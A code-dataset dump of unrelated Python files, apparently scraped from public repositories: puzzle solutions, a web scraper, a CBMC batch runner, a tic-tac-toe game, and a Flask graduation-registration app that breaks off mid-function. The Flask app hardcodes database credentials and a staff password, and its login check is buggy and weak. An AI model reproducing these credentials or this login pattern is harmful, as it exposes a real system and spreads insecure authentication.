\"{}\"'.format(WEBHOOK_URL))\n\n\n@app.route('/hook', methods=['POST'])\ndef webhook_handler():\n print('In handler')\n update = telegram.Update.de_json(request.get_json(force=True), bot)\n machine.advance(update)\n return 'ok'\n\n\n@app.route('/show-fsm', methods=['GET'])\ndef show_fsm():\n byte_io = BytesIO()\n machine.graph.draw(byte_io, prog='dot', format='png')\n byte_io.seek(0)\n return send_file(byte_io, attachment_filename='fsm.png', mimetype='image/png')\n\n\nif __name__ == \"__main__\":\n _set_webhook()\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"616766169","text":"import sys\n\n\ndef problem1(s):\n result = {0: 151, 1: 0, 2: 0}\n for layer in range(100):\n count = {0: 0, 1: 0, 2: 0}\n for pixel in range(150):\n pixel_value = int(s[layer * 150 + pixel])\n count[pixel_value] += 1\n if count[0] < result[0]:\n result = count\n print(result[1] * result[2])\n\n\ndef problem2(s):\n image = \"\"\n for pixel in range(150):\n for layer in range(100):\n pixel_value = int(s[layer * 150 + pixel])\n if pixel_value != 2:\n image += \"*\" if pixel_value == 1 else \" \"\n break\n for start_pos in range(0, 150, 25):\n print(image[start_pos:start_pos + 25])\n\n\nwith open(sys.argv[1], \"r\") as f:\n line = f.readline()\n problem1(line)\n problem2(line)\n","sub_path":"2019/Day08/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"325176074","text":"#Python Solution Rotating Prime Number\n\n\ndef isPrime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n for i in range(2, int((n + 1) ** .5 + 1)):\n if n % i == 0:\n return False\n return True\n\n\ndef rotate_list(n):\n result = []\n new_num = str(n)\n for i in range(len(str(n))):\n new_num = new_num[1:] + new_num[0]\n if isPrime(int(new_num)):\n result.append(int(new_num))\n else:\n return False\n # print(result)\n return True\n\n\nz = int(input('Enter upper limit number: '))\nres_list = []\nfor i in range(z+1):\n if isPrime(i):\n if rotate_list(i):\n res_list.append(i)\ncount = len(res_list)\nprint('There are {} circular prime numbers, the list is {}'.format(count, res_list))","sub_path":"Q0002_rotatingPrime.py","file_name":"Q0002_rotatingPrime.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"473212769","text":"# QUESTION:\r\n# This is an interview question asked by Quora.\r\n# Given a string, find the palindrome that can be made by inserting the fewest number\r\n# of characters as possible anywhere in the word. If there is more than one palindrome\r\n# of minimum length that can be made, return the lexicographically earliest one (the first\r\n# one alphabetically). For example, given the string \"race\", you should return \"ecarace\",\r\n# since we can add three letters to it (which is the smallest amount to make a palindrome).\r\n# There are seven other palindromes that can be made from \"race\" by adding three letters, but\r\n# \"ecarace\" comes first alphabetically.\r\n# As another example, given the string \"google\", you should return \"elgoogle\".\r\n\r\ndef f_min_insert(s): \r\n if s == s[::-1]: \r\n return s\r\n if s[0] == s[-1]: \r\n return s[0] + f_min_insert(s[1:-1]) + s[-1]\r\n else:\r\n sl = s[0] + f_min_insert(s[1:]) + s[0]\r\n sr = s[-1] + f_min_insert(s[:-1]) + s[-1]\r\n if len(sl) > len(sr):\r\n return sr\r\n elif len(sl) < len(sr):\r\n return sl\r\n return sl if sl < sr else sr","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"266867810","text":"import scrapy\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nfrom scrapy.selector import Selector\nfrom tables_crawler.items import TablesCrawlerItem\n\nclass TableSpider(scrapy.Spider):\n name = \"Tables\"\n allowed_domains = [\"premierleague.com\"]\n start_urls = [\"https://www.premierleague.com/tables\"]\n \n def __init__(self):\n scrapy.Spider.__init__(self)\n self.browser = webdriver.Chrome('/Users/hyunilyoo/Documents/analytics/chromedriver')\n \n def parse(self, response):\n self.browser.get(response.url)\n time.sleep(5)\n self.html = self.browser.find_element_by_xpath('//*').get_attribute('outerHTML')\n self.selector = Selector(text=self.html)\n self.season_epl = len(self.selector.xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/ul/li'))+1\n \n # Season dropdown\n for i in range(2, self.season_epl):\n time.sleep(5)\n self.browser.find_element_by_xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/div[2]').click()\n time.sleep(3)\n\n if i < 10: \n self.browser.find_element_by_xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/ul/li'+f'[{i}]').click()\n\n elif i >= 10 and i < 19:\n self.browser.execute_script('window.scrollTo(0, 150)')\n self.browser.find_element_by_xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/ul/li'+f'[{i}]').click()\n\n else:\n self.browser.execute_script('window.scrollTo(0, 330)')\n self.browser.find_element_by_xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[1]/section/div[2]/ul/li'+f'[{i}]').click()\n\n time.sleep(5)\n self.html = self.browser.find_element_by_xpath('//*').get_attribute('outerHTML')\n self.selector = Selector(text=self.html)\n self.rows = self.selector.xpath('//*[@id=\"mainContent\"]/div[2]/div[1]/div[5]/div/div/div/table/tbody/tr[not(@class=\"expandable\")]')\n\n for row in self.rows:\n self.item = TablesCrawlerItem()\n self.item[\"club_name\"] = row.xpath('./td[3]/a/span[2]/text()')[0].extract()\n self.item[\"position\"] = row.xpath('./td[2]/span[1]/text()')[0].extract()\n self.item[\"won\"] = row.xpath('./td[5]/text()')[0].extract()\n self.item[\"lost\"] = row.xpath('./td[7]/text()')[0].extract()\n self.item[\"drawn\"] = row.xpath('./td[6]/text()')[0].extract()\n self.item[\"goal\"] = row.xpath('./td[8]/text()')[0].extract()\n self.item[\"goal_against\"] = row.xpath('./td[9]/text()')[0].extract()\n self.item[\"points\"] = row.xpath('./td[11]/text()')[0].extract()\n yield self.item\n \n self.browser.quit()\n\n","sub_path":"tables_crawler/tables_crawler/spiders/tables_spider.py","file_name":"tables_spider.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"247516306","text":"filename = input('Input filename (without extension):\\n')\n\nfileIn = open(str(filename) + '.txt', 'r')\nlines = []\n\nfor line in fileIn:\n lines.append(line)\n\nlines.sort()\n\nfileOut = open(str(filename) + '_sorted.txt', 'w')\nfor line in lines:\n fileOut.write(line)\n\nprint('Lines in file: ' + str(len(lines)))\nprint('File Sorted!')\n\nfileIn.close()\nfileOut.close()\n","sub_path":"FileAlphabetizer/alphabetizer.py","file_name":"alphabetizer.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"591881953","text":"if __name__ =='__main__':\n students = []\n check = set()\n output = []\n\n for i in range(int(input(\"Enter number of student \"))):\n name = input(\"Enter Students name \")\n score = float(input(\"Enter Students score \"))\n students.append([name,score])\n check.add(score)\n\n second_last = sorted(list(check))[1]\n\n output = [i[0] for i in students if i[1]==second_last]\n output = sorted(output)\n\n for i in output:\n print(i)\n","sub_path":"Python/Nested Lists/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"503556474","text":"# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"Entry point for CBMC job on AWS Batch docker container image\"\"\"\n\nimport datetime\nimport json\nimport subprocess\nimport os\nimport sys\nfrom pprint import pprint\nimport time\nimport shutil\nimport re\n\nimport boto3\n\nimport s3\nimport options\nimport package\n\nPUBLIC_WEBSITE_METADATA = {\"public-website-contents\": \"True\"}\ndef abort(msg):\n \"\"\"Abort a docker container\"\"\"\n sys.stdout.flush()\n print(msg)\n sys.stdout.flush()\n raise UserWarning(msg)\n\ndef install_cbmc(opts):\n \"\"\"Install CBMC binaries\"\"\"\n package.copy('cbmc', opts['pkgbucket'], opts['cbmcpkg'])\n package.install('cbmc', opts['cbmcpkg'], 'cbmc')\n\ndef install_viewer(opts):\n \"\"\"Install the cbmc-viewer tool\"\"\"\n package.copy('cbmc-viewer', opts['pkgbucket'], opts['viewerpkg'])\n package.install('cbmc-viewer', opts['viewerpkg'], 'cbmc-viewer')\n\ndef get_buckets(opts, copysrc=True):\n \"\"\"Copy input buckets to container.\"\"\"\n\n if copysrc:\n if opts['srctarfile']:\n tarfile = s3.key_name(opts['srctarfile'])\n tardir = os.path.dirname(opts['srcdir'].rstrip('/'))\n s3.copy_object_to_file(\n opts['srctarfile'], tarfile, region=opts['region'])\n try:\n os.makedirs(tardir)\n except OSError:\n abort(\"Failed to make directory {}\".format(tardir))\n cmd = ['tar', 'fx', tarfile, '-C', tardir]\n try:\n subprocess.check_call(cmd)\n except subprocess.CalledProcessError:\n abort(\"Failed to run command {}\".format(' '.join(cmd)))\n if not os.path.isdir(opts['srcdir']):\n abort(\"Failed to create {} by untarring {}\"\n .format(opts['srcdir'], opts['srctarfile']))\n else:\n s3.sync_bucket_to_directory(opts['srcbucket'], opts['srcdir'])\n # make scripts in the source tree executable\n subprocess.check_call(['chmod', '+x', '-R', opts['srcdir']])\n s3.sync_bucket_to_directory(opts['wsbucket'], opts['wsdir'])\n s3.sync_bucket_to_directory(opts['outbucket'], opts['wsdir'])\n\ndef put_buckets(opts):\n \"\"\"Copy container output to bucket.\"\"\"\n\n s3.sync_directory_to_bucket(opts['wsdir'], opts['outbucket'], metadata=PUBLIC_WEBSITE_METADATA)\n\ndef checkpoint_file(filename, fileobj, s3path, region):\n \"\"\"Write a checkpoint of an open file to a bucket\"\"\"\n\n ckptname = \"chkpt-{}\".format(filename)\n match = re.match(r'(.+)\\.([^.]+)', filename)\n if match:\n ckptname = \"{}-chkpt.{}\".format(match.group(1), match.group(2))\n\n fileobj.flush()\n shutil.copyfile(filename, ckptname)\n s3.copy_file_to_object(\n ckptname, \"{}/{}\".format(s3path, ckptname), region=region)\n\ndef checkpoint_performance(logfile, s3path, taskname, region):\n \"\"\"Write performance information to a logfile in a bucket\"\"\"\n\n gmt = time.gmtime()\n timestamp = (\"{:04d}{:02d}{:02d}-{:02d}{:02d}{:02d}\"\n .format(gmt.tm_year, gmt.tm_mon, gmt.tm_mday,\n gmt.tm_hour, gmt.tm_min, gmt.tm_sec))\n output = subprocess.check_output(['ps', 'ux'])\n cbmc_ps_line = None\n with open(logfile, \"a\") as logobj:\n logobj.write(\"\\n{}\\n\".format(timestamp))\n for line in output.split('\\n'):\n if 'USER' in line:\n logobj.write(line[:80]+'\\n')\n elif 'cbmc' in line:\n logobj.write(line[:80]+'\\n')\n cbmc_ps_line = line.split()\n s3.copy_file_to_object(\n logfile, \"{}/{}\".format(s3path, logfile), region=region)\n\n if not cbmc_ps_line:\n return\n\n client = boto3.client('cloudwatch', region_name=region)\n cloudwatch_timestamp = str(\n datetime.datetime.fromtimestamp(time.mktime(gmt)))\n client.put_metric_data(\n Namespace='CBMC-Batch',\n MetricData=[\n {\n 'MetricName': 'CPU [%]',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Timestamp': cloudwatch_timestamp,\n 'Value': float(cbmc_ps_line[2]),\n 'Unit': 'Percent'\n },\n {\n 'MetricName': 'Memory [%]',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Timestamp': cloudwatch_timestamp,\n 'Value': float(cbmc_ps_line[3]),\n 'Unit': 'Percent'\n },\n {\n 'MetricName': 'Memory [MB]',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Timestamp': cloudwatch_timestamp,\n 'Value': float(cbmc_ps_line[4]) / 1024.0,\n 'Unit': 'Megabytes'\n }\n ])\n\n\ndef run_command(command, outfile, errfile, psfile, opts, delay=10):\n \"\"\"Run command in container\"\"\"\n\n # pylint: disable=too-many-arguments\n\n cwd = os.getcwd()\n os.chdir(opts['wsdir'])\n\n sys.stdout.flush()\n print(\"command = \"+\" \".join(command))\n print(\"outfile = \"+outfile)\n print(\"errfile = \"+errfile)\n print(\"psfile = \"+psfile)\n print(\"options = \")\n pprint(opts)\n print(\"cwd = \"+os.getcwd())\n print(\"PATH = \"+os.environ['PATH'])\n sys.stdout.flush()\n\n print(\"Running command: {}\".format(' '.join(command)))\n\n with open(outfile, \"w\") as outobj, open(errfile, \"w\") as errobj:\n popen = subprocess.Popen(command, universal_newlines=True,\n stdout=outobj, stderr=errobj)\n\n path = opts['outbucket']\n taskname = opts['taskname']\n region = opts['region']\n while popen.poll() is None:\n checkpoint_file(outfile, outobj, path, region)\n checkpoint_file(errfile, errobj, path, region)\n checkpoint_performance(psfile, path, taskname, region)\n time.sleep(delay)\n\n print(\"Command returned error code {}: {}\".format(popen.returncode,\n ' '.join(command)))\n os.chdir(cwd)\n\ndef launch_build(opts):\n \"\"\"Launch the build step\"\"\"\n\n install_cbmc(opts)\n get_buckets(opts)\n print(\"Launching Build\")\n cmd = ['make', 'goto']\n run_command(cmd, 'build.txt', 'build-err.txt', 'build-ps.txt', opts)\n print(\"Finished Build\")\n put_buckets(opts)\n\ndef launch_property(opts):\n \"\"\"Launch the property step\"\"\"\n\n install_cbmc(opts)\n get_buckets(opts, copysrc=False)\n print(\"Launching Property\")\n\n cmd = ['cbmc', opts['goto']]\n cmd += options.options_dict2words(opts['cbmcflags'])\n cmd += ['--trace']\n run_command(cmd, 'cbmc.txt', 'cbmc-err.txt', 'cbmc-ps.txt', opts)\n\n cmd = ['cbmc', opts['goto']]\n cmd += options.options_dict2words(opts['cbmcflags'])\n cmd += ['--show-properties', '--xml-ui']\n run_command(cmd, 'property.xml', 'property-err.txt', 'property-ps.txt',\n opts)\n\n print(\"Finished Property\")\n put_buckets(opts)\n\ndef launch_coverage(opts):\n \"\"\"Launch the coverage step\"\"\"\n\n install_cbmc(opts)\n get_buckets(opts, copysrc=False)\n print(\"Launching Coverage\")\n\n cmd = ['cbmc', opts['goto']]\n # CBMC forbids --unwinding-assertions with --cover\n cmd += [opt\n for opt in options.options_dict2words(opts['cbmcflags'])\n if not opt in ['--unwinding-assertions',\n '--trace',\n '--stop-on-fail']]\n cmd += ['--cover', 'location', '--xml-ui']\n run_command(cmd, 'coverage.xml', 'coverage-err.txt', 'coverage-ps.txt',\n opts)\n\n print(\"Finished Coverage\")\n put_buckets(opts)\n\ndef launch_report(opts):\n \"\"\"Launch the report step\"\"\"\n\n install_cbmc(opts)\n install_viewer(opts)\n get_buckets(opts)\n print(\"Launching Report\")\n\n cmd = ['cbmc-viewer',\n '--srcdir', opts['srcdir'],\n '--htmldir', 'html',\n '--goto', opts['goto'],\n '--result', 'cbmc.txt',\n '--property', 'property.xml',\n '--block', 'coverage.xml',\n '--blddir', opts['blddir'],\n '--json-summary', 'summary.json'\n ]\n run_command(cmd, 'report.txt', 'report-err.txt', 'report-ps.txt', opts)\n\n print(\"Finished Report\")\n put_buckets(opts)\n\n summary = None\n with open(os.path.join(opts['wsdir'], 'summary.json'), 'r') as j:\n summary = json.load(j)\n if not summary.get('coverage'):\n print(\"Incomplete summary: \" + str(summary))\n return\n\n lines = summary['coverage']['statically-reachable']['lines']\n coverage = (\n float(summary['coverage']['statically-reachable']['hit']) /\n float(lines))\n taskname = opts['taskname']\n client = boto3.client('cloudwatch', region_name=opts['region'])\n client.put_metric_data(\n Namespace='CBMC-Batch',\n MetricData=[\n {\n 'MetricName': 'Coverage',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Value': coverage * 100.0,\n 'Unit': 'Percent'\n },\n {\n 'MetricName': 'Lines of Code',\n 'Dimensions': [{'Name': 'Job', 'Value': taskname}],\n 'Value': lines,\n 'Unit': 'None'\n }\n ])\n\n\ndef main():\n \"\"\"Run the job\"\"\"\n\n def more_than_one(bits):\n \"\"\"Test for more than one boolean value True.\"\"\"\n count = 0\n for bit in bits:\n count += int(bit)\n return count > 1\n\n opts = options.docker_options()\n\n print(\"docker options\")\n pprint(opts)\n\n if more_than_one([opts['dobuild'], opts['doproperty'],\n opts['docoverage'], opts['doreport']]):\n print(\"Too many commands passed to docker container.\")\n return\n\n if opts['dobuild']:\n print(\"docker doing build\")\n launch_build(opts)\n return\n\n if opts['doproperty']:\n print(\"docker doing property\")\n launch_property(opts)\n return\n\n if opts['docoverage']:\n print(\"docker doing coverage\")\n launch_coverage(opts)\n return\n\n if opts['doreport']:\n print(\"docker doing report\")\n launch_report(opts)\n return\n\n print(\"docker done\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bin/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":10266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"152707544","text":"#!/usr/bin/env python3\n'''\nTriaging tool to help understand where we need more timing coverage\nFinds correlated variables to help make better test cases\n'''\n\nfrom timfuz import Benchmark, Ar_di2np, loadc_Ads_b, index_names, A_ds2np, simplify_rows\nimport numpy as np\nimport glob\nimport math\nimport json\nimport sympy\nfrom collections import OrderedDict\nfrom fractions import Fraction\nimport random\nfrom sympy import Rational\n\n\ndef intr(r):\n DELTA = 0.0001\n\n for i, x in enumerate(r):\n if type(x) is float:\n xi = int(x)\n assert abs(xi - x) < DELTA\n r[i] = xi\n\n\ndef fracr(r):\n intr(r)\n return [Fraction(x) for x in r]\n\n\ndef fracm(m):\n return [fracr(r) for r in m]\n\n\ndef symratr(r):\n intr(r)\n return [Rational(x) for x in r]\n\n\ndef symratm(m):\n return [symratr(r) for r in m]\n\n\ndef intm(m):\n [intr(r) for r in m]\n return m\n\n\ndef create_matrix(rows, cols):\n ret = np.zeros((rows, cols))\n for rowi in range(rows):\n for coli in range(cols):\n ret[rowi][coli] = random.randint(1, 10)\n return ret\n\n\ndef create_matrix_sparse(rows, cols):\n ret = np.zeros((rows, cols))\n for rowi in range(rows):\n for coli in range(cols):\n if random.randint(0, 5) < 1:\n ret[rowi][coli] = random.randint(1, 10)\n return ret\n\n\ndef run(\n rows=35,\n cols=200,\n verbose=False,\n encoding='np',\n sparse=False,\n normalize_last=True):\n random.seed(0)\n if sparse:\n mnp = create_matrix_sparse(rows, cols)\n else:\n mnp = create_matrix(rows, cols)\n #print(mnp[0])\n\n if encoding == 'fraction':\n msym = sympy.Matrix(fracm(mnp))\n elif encoding == 'np':\n msym = sympy.Matrix(mnp)\n elif encoding == 'sympy':\n msym = sympy.Matrix(symratm(mnp))\n # this actually produces float results\n elif encoding == 'int':\n msym = sympy.Matrix(intm(mnp))\n else:\n assert 0, 'bad encoding: %s' % encoding\n print(type(msym[0]), str(msym[0]))\n\n if verbose:\n print('names')\n print(names)\n print('Matrix')\n sympy.pprint(msym)\n\n print(\n '%s matrix, %u rows x %u cols, sparse: %s, normlast: %s' %\n (encoding, len(mnp), len(mnp[0]), sparse, normalize_last))\n bench = Benchmark()\n try:\n rref, pivots = msym.rref(normalize_last=normalize_last)\n finally:\n print('rref exiting after %s' % bench)\n print(type(rref[0]), str(rref[0]))\n\n if verbose:\n print('Pivots')\n sympy.pprint(pivots)\n print('rref')\n sympy.pprint(rref)\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser(\n description='Matrix solving performance tests')\n\n parser.add_argument('--verbose', action='store_true', help='')\n parser.add_argument('--sparse', action='store_true', help='')\n parser.add_argument('--rows', type=int, help='')\n parser.add_argument('--cols', type=int, help='')\n parser.add_argument('--normalize-last', type=int, help='')\n parser.add_argument('--encoding', default='np', help='')\n args = parser.parse_args()\n\n run(\n encoding=args.encoding,\n rows=args.rows,\n cols=args.cols,\n sparse=args.sparse,\n normalize_last=bool(args.normalize_last),\n verbose=args.verbose)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fuzzers/007-timing/minitest/test_unique/perf_test.py","file_name":"perf_test.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"103865783","text":"import logging\nimport os\nfrom datetime import datetime\n\nimport cv2\n\nfrom fishy.helper.helper import get_documents\n\nimport numpy as np\nfrom pyzbar.pyzbar import decode\n\n\ndef get_qr_location(og_img):\n \"\"\"\n code from https://stackoverflow.com/a/45770227/4512396\n \"\"\"\n gray = cv2.bilateralFilter(og_img, 11, 17, 17)\n kernel = np.ones((5, 5), np.uint8)\n erosion = cv2.erode(gray, kernel, iterations=2)\n kernel = np.ones((4, 4), np.uint8)\n img = cv2.dilate(erosion, kernel, iterations=2)\n\n cnt, h = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n valid_crops = []\n for i in range(len(cnt)):\n area = cv2.contourArea(cnt[i])\n if 500 < area < 100000:\n mask = np.zeros_like(img)\n cv2.drawContours(mask, cnt, i, 255, -1)\n x, y, w, h = cv2.boundingRect(cnt[i])\n qr_result = decode(og_img[y:h + y, x:w + x])\n if qr_result:\n valid_crops.append(((x, y, x + w, y + h), area))\n\n return min(valid_crops, key=lambda c: c[1])[0] if valid_crops else None\n\n\n# noinspection PyBroadException\ndef get_values_from_image(img):\n try:\n for qr in decode(img):\n vals = qr.data.decode('utf-8').split(\",\")\n return float(vals[0]), float(vals[1]), float(vals[2])\n\n logging.error(\"FishyQR not found, try restarting the engine\")\n return None\n except Exception:\n logging.error(\"Couldn't read coods, make sure 'crop' calibration is correct\")\n cv2.imwrite(os.path.join(get_documents(), \"fishy_failed_reads\", f\"{datetime.now()}.jpg\"), img)\n return None\n","sub_path":"fishy/engine/fullautofisher/qr_detection.py","file_name":"qr_detection.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"193758037","text":"\ndef create_board():\n \"\"\"Creates a 3x3 board\n\n Returns\n -------\n list\n A list containing three lists, each of which contains three strings\n \"\"\"\n\n board = [\n [' ', ' ', ' '],\n [' ', ' ', ' '],\n [' ', ' ', ' ']\n ]\n return board\n\n\ndef print_board(board):\n \"\"\"Prints a 3x3 board\n\n Parameters\n ----------\n board : list\n A list containing three lists, each of which contains three strings\n \"\"\"\n\n print(' {} | {} | {} '.format(board[0][0], board[0][1], board[0][2]))\n print('___|___|___')\n print(' {} | {} | {} '.format(board[1][0], board[1][1], board[1][2]))\n print('___|___|___')\n print(' {} | {} | {} '.format(board[2][0], board[2][1], board[2][2]))\n print(' | | ')\n\n\ndef place_sign(board, signs):\n \"\"\"Places the sign on the board\n\n Parameters\n ----------\n board : list\n A list containing three lists, each of which contains three strings\n signs : list\n A list containing two strings - each string represents a sign\n \"\"\"\n\n try:\n print_board(board)\n row = int(input('Enter a row to place ' + signs[0] + ' (1, 2 or 3): '))\n col = int(input('Enter a col to place ' + signs[0] + ' (1, 2 or 3): '))\n if board[row - 1][col - 1] == ' ':\n board[row - 1][col - 1] = signs[0] # places the sign on the board if the place is free\n else:\n print('THIS PLACE IS OCCUPIED, PLEASE TRY AGAIN')\n place_sign(board, signs)\n except ValueError: # handles a situation when user input can not be converted to an integer\n print('ERROR - ENTER VALID NUMBER ')\n place_sign(board, signs)\n except IndexError: # handles a situation when user input is out of the board's index range\n print('ERROR - ENTER VALID NUMBER ')\n place_sign(board, signs)\n\n\ndef winner_check(board):\n \"\"\"Checks if there is a winner\n\n Parameters\n ----------\n board : list\n A list containing three lists, each of which contains three strings\n\n Returns\n -------\n bool or str\n False if there is no winner or string representing a winner if there is a winner\n \"\"\"\n\n winner = False\n for i in range(len(board)):\n if board[i][0] == board[i][1] == board[i][2] != ' ': # looks for a winner in the horizontal lines\n winner = board[i][0]\n elif board[0][i] == board[1][i] == board[2][i] != ' ': # looks for a winner in the vertical lines\n winner = board[0][i]\n if board[0][0] == board[1][1] == board[2][2] != ' ': # looks for a winner in the diagonals\n winner = board[0][0]\n elif board[0][2] == board[1][1] == board[2][0] != ' ':\n winner = board[0][2]\n return winner\n\n\ndef draw_check(board):\n \"\"\"Checks if there is a draw\n\n Parameters\n ----------\n board : list\n A list containing three lists, each of which contains three strings\n\n Returns\n -------\n bool\n True if there is a draw, False if there is no draw\n \"\"\"\n\n for el in board:\n if ' ' in el:\n return False\n return True\n\n\nmy_signs = ['x', 'o']\nmy_board = create_board()\nprint('Welcome to my game ^ ^')\nwhile True:\n if winner_check(my_board):\n print_board(my_board)\n print('The winner is ' + winner_check(my_board))\n break\n elif draw_check(my_board):\n print_board(my_board)\n print('There is a draw')\n break\n place_sign(my_board, my_signs)\n my_signs = my_signs[::-1] # swaps the signs so that players can take turns\n\n\n\n\n\n","sub_path":"games/TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"597848848","text":"import time\nimport string\nimport os, sys\nfrom pathlib import Path\n\ndsets = [\n 'Hill_Valley_with_noise',\n 'Hill_Valley_without_noise',\n 'breast-cancer-wisconsin',\n 'car-evaluation',\n 'glass',\n 'ionosphere',\n 'spambase',\n 'wine-quality-red',\n 'wine-quality-white'\n]\n\n#jobname_template = 'eval-{0}-{1}_{2}_{3}'\njobname_prefix = 'tpot-nn'\n\n# Create directories if they don't already exist\nPath(\"./job_files\").mkdir(parents=True, exist_ok=True)\nPath(\"./logs\").mkdir(parents=True, exist_ok=True)\nPath(\"./pipelines\").mkdir(parents=True, exist_ok=True)\nPath(\"./pmlb_data_cache\").mkdir(parents=True, exist_ok=True)\n\ndef make_jobfile(dataset, use_template, use_nn, estimator, solo, n_reps=5):\n \n py_cmd = 'python model_script.py --dataset={0}'.format(dataset)\n if use_nn:\n py_cmd += ' --use_nn'\n if use_template:\n py_cmd += ' --use_template'\n if solo:\n py_cmd += ' --solo'\n py_cmd += ' --estimator_select {0}'.format(estimator)\n \n use_nn_str = 'nn' if use_nn else 'no-nn'\n type_str = 'template' if use_template else 'config'\n dset_str = dataset.lower().translate(str.maketrans('', '', string.punctuation))\n solo_str = 'solo' if solo else 'nosolo'\n\n for rep in range(1, n_reps+1):\n jobname = \"{0}_{1}_{2}_{3}_{4}_{5}_rep{6}_{7}\".format(\n jobname_prefix, estimator, use_nn_str, solo_str, type_str, dset_str, rep, int(time.time())\n )\n\n py_cmd_rep = py_cmd + ' --jobname {0}'.format(jobname)\n\n jobfile_path = 'job_files/{0}.sh'.format(jobname)\n jobfile = open(jobfile_path, 'w')\n jobfile.writelines([\n '#!/bin/bash\\n',\n '#BSUB -J {0}\\n'.format(jobname),\n '#BSUB -q \"epistasis_long\"\\n'\n '#BSUB -o logs/{0}.out\\n'.format(jobname),\n '#BSUB -e logs/{0}.err\\n'.format(jobname),\n '#BSUB -M 10000\\n',\n '\\n',\n '{0}\\n'.format(py_cmd_rep)\n ])\n jobfile.close()\n\n os.system('bsub < ' + jobfile_path)\n\nfor dset in dsets:\n for nn in [True, False]:\n for solo_estimator in [True, False]:\n for use_template in [True, False]:\n for model in ['lr', 'mlp', 'all']:\n if (model == 'all') and (solo_estimator == True):\n # It doesn't make sense to do 'all estimators' and NOT search for the best estimator\n continue\n if (use_template) and (solo_estimator == True):\n # Likewise, template option invalidates solo estimator\n continue\n \n # Allow stacking\n make_jobfile(dataset=dset, use_template=use_template,\n use_nn=nn, solo=solo_estimator, estimator=model)\n\n # Don't allow stacking\n make_jobfile(dataset=dset, use_template=use_template,\n use_nn=nn, solo=solo_estimator, estimator=model)\n","sub_path":"ARCHIVE/job_builder.py","file_name":"job_builder.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"373349506","text":"import mysql.connector\nfrom flask import Flask, render_template, flash, redirect, url_for, request\nfrom Flask_blog.forms import RegistrationForm, LoginForm, StudentInfo, QuestionTHForm, OfficeLogin\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '13137a5685deb14119a8bce78825349b'\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template('home.html')\n\n\n@app.route(\"/login\", methods = ['POST', 'GET'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n std_id = request.form['username']\n mydb = mysql.connector.connect(\n host = \"graduation.stamford.edu\",\n user = \"graduati_dbadmin\",\n password = \"y5wiE&RfprAnyrJS\",\n database = \"graduati_dbserver\",\n port = \"3306\"\n )\n mycursor = mydb.cursor()\n mycursor.execute(\"SELECT name,student_id,seat_number,registered FROM graduate_students WHERE student_id =%s\",\n (std_id,))\n my_result = mycursor.fetchall()\n if mycursor:\n mycursor.close()\n if mydb:\n mydb.close()\n if my_result:\n if my_result[0][3] == 1:\n current_student = StudentInfo\n current_student.student_name = my_result[0][0]\n current_student.student_id = my_result[0][1]\n current_student.student_seat = my_result[0][2]\n return redirect(url_for('success'))\n else:\n current_student = StudentInfo\n current_student.student_name = my_result[0][0]\n current_student.student_id = my_result[0][1]\n current_student.student_seat = my_result[0][2]\n return redirect(url_for('question'))\n else:\n return redirect(url_for('about'))\n\n return render_template('login.html', title = 'Login', form = form)\n\n\n@app.route(\"/office_login\", methods = ['POST', 'GET'])\ndef office_login():\n form = OfficeLogin()\n if form.validate_on_submit():\n username = request.form['username']\n password = request.form['password']\n if username == 'staff' & password == 'admin2020':\n return redirect(url_for('home'))\n return render_template('office_login.html', form = form)\n\n\n@app.route(\"/question\", methods = ['POST', 'GET'])\ndef question():\n 